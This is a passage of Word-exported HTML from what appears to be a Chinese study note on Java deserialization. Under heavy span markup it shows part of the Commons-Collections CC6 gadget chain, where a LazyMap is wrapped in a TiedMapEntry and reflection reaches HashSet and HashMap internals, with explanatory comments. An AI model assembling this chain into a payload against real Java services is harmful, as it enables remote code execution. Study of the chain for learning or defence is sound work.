style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">TiedMapEntry</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">lazyMap</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"foo"</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">HashSet</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> map </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">HashSet</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">1</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">map</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">add</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"foo"</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">//添加一个键</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Field</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> f </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">null</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">try</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span>f </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">HashSet</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getDeclaredField</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"map"</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">//获取map属性</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">catch</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">NoSuchFieldException</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> e</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span>f </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">HashSet</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getDeclaredField</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"backingMap"</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">Reflections</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">setAccessible</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">f</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">HashMap</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> innimpl </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">HashMap</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> f</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">get</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">map</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">//获取map实例的map属性。【也就是"foo"->】键值对</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Field</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> f2 </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">null</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">try</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span>f2 </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">HashMap</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getDeclaredField</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"table"</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">catch</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">NoSuchFieldException</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> e</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span>f2 </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">HashMap</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getDeclaredField</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"elementData"</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              

